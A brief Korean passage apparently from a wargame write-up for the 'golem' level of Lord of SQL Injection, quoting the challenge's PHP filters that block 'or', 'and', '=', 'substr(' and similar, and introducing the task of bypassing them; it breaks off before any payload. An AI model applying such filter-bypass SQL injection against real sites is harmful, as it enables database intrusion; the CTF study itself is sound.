[LOS] Golem ํ’€์ด(11)

11๋ฒˆ์งธ ๋ฌธ์ œ์ธ " golem " ๋ฌธ์ œ๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด 2๊ฐ€์ง€ ๊ฒ€์ฆ์ ˆ์ฐจ๋ฅผ ๊ฑฐ์น˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. if(preg_match('/prob|_|\.|\(\)/i', $_GET [pw])) exit("No Hack ~_~"); if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); ๊ฒ€์ฆํ•˜๊ณ  ์žˆ๋Š” ๋ฌธ๊ตฌ๋“ค์„ ํ™•์ธํ•ด๋ณด๋ฉด ์ฃผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ์—ฐ์‚ฐ์ž์ธ " or, and, = " ๊ทธ๋ฆฌ๊ณ  ๋ฌธ์ž์—ด์„ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ํ•จ์ˆ˜์ธ " substr " ๊นŒ์ง€ ๊ฒ€์ฆ์„ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ „ ๋‹จ๊ณ„์˜ ๋ ˆ๋ฒจ์—์„œ๋Š” or์™€ and ์—ฐ์‚ฐ์ž ๋Œ€์ฒด ๊ธฐ๋ฒ•์„ ์‚ฌ์šฉํ–ˆ์ง€๋งŒ substr ํ•จ์ˆ˜๊นŒ์ง€ ์šฐํšŒํ•ด์•ผ ๋˜๋‹ˆ ์ข€ ๋” ๊นŒ๋‹ค๋กœ์›Œ์กŒ๋‹ค๊ณ  ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. $query = "select pw from prob_golem where id..

CHALLENGE